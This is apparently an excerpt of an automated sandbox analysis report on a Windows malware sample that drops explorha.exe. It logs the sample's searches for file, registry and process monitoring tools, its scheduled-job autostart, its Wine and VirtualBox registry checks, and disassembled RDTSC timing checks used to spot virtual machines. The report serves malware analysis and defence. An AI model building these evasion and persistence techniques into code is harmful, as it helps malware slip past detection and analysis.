Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\Desktop\MejqsB9tx9.exe File created: C:\Windows\Tasks\explorha.job Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\MejqsB9tx9.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: Software\Wine
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: Software\Wine
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: Software\Wine
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: Software\Wine
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: Software\Wine
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E7388D second address: E73891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E72A7A second address: E72A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E731D9 second address: E731E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnp 00007FB16CB2DB76h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E74BC7 second address: E74BD1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB16D386886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E74BD1 second address: E74C8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16CB2DB83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 34FD6C66h 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FB16CB2DB78h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a or edx, dword ptr [ebp+122D39E9h] 0x00000030 push 00000003h 0x00000032 jno 00007FB16CB2DB7Ch 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D33A5h], ebx 0x00000040 push 00000003h 0x00000042 jmp 00007FB16CB2DB82h 0x00000047 call 00007FB16CB2DB79h 0x0000004c pushad 0x0000004d pushad 0x0000004e pushad 0x0000004f popad 0x00000050 je 00007FB16CB2DB76h 0x00000056 popad 0x00000057 push ebx 0x00000058 jmp 00007FB16CB2DB85h 0x0000005d pop ebx 0x0000005e popad 0x0000005f push eax 0x00000060 jmp 00007FB16CB2DB80h 0x00000065 mov eax, dword ptr [esp+04h] 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007FB16CB2DB7Ch 0x00000070 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E74EEF second address: E74F0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16D386891h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E74F0A second address: E74F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E74F0F second address: E74F15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E74F15 second address: E74F19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E74F19 second address: E74F87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16D386895h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ebx, dword ptr [ebp+122D3507h] 0x00000014 sbb cl, FFFFFFF3h 0x00000017 popad 0x00000018 pop edx 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007FB16D386888h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 push 28710987h 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FB16D386899h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E74F87 second address: E74F95 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FB16CB2DB7Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E74F95 second address: E75007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xor dword ptr [esp], 28710907h 0x0000000c ja 00007FB16D38688Fh 0x00000012 xor di, 0F49h 0x00000017 push 00000003h 0x00000019 xor esi, 1F78BB26h 0x0000001f push 00000000h 0x00000021 mov dword ptr [ebp+122D1972h], esi 0x00000027 push 00000003h 0x00000029 mov si, 30B8h 0x0000002d push F26C974Ah 0x00000032 ja 00007FB16D38689Bh 0x00000038 xor dword ptr [esp], 326C974Ah 0x0000003f mov esi, 711747BDh 0x00000044 lea ebx, dword ptr [ebp+12459A6Bh] 0x0000004a mov si, 86D7h 0x0000004e xchg eax, ebx 0x0000004f push esi 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E75007 second address: E7500B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E93667 second address: E9366B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E9366B second address: E93671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E93671 second address: E93698 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16D38688Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f pop eax 0x00000010 jns 00007FB16D386886h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jg 00007FB16D386886h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E93698 second address: E936AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16CB2DB7Bh 0x00000007 je 00007FB16CB2DB76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E936AD second address: E936D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16D38688Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB16D386896h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E9398C second address: E93996 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E93996 second address: E9399A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E9399A second address: E939A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E93B31 second address: E93B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB16D386886h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E93C83 second address: E93C8D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB16CB2DB76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
